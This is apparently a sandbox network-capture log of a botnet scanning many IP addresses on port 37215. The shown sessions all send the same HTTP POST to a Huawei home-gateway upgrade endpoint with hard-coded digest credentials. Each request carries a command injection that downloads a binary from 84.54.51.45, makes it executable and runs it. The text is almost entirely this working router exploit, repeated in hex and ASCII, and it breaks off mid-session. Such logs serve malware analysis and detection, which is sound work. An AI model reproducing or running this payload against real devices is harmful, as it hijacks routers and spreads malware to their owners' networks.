68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            635192.168.2.153797841.43.233.4437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160382986 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            636192.168.2.154456241.53.153.337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160401106 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            637192.168.2.155814041.246.168.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160422087 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            638192.168.2.153388441.252.143.12437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160423040 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            639192.168.2.155811041.174.16.23437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160469055 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            640192.168.2.154108241.175.239.3337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160470009 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            641192.168.2.154864041.84.135.13837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160470963 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            642192.168.2.154577441.160.38.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160497904 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            643192.168.2.155330641.24.25.7637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160511971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            644192.168.2.153377041.58.223.16237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160552025 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            645192.168.2.154570841.181.124.13937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:08.160557032 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
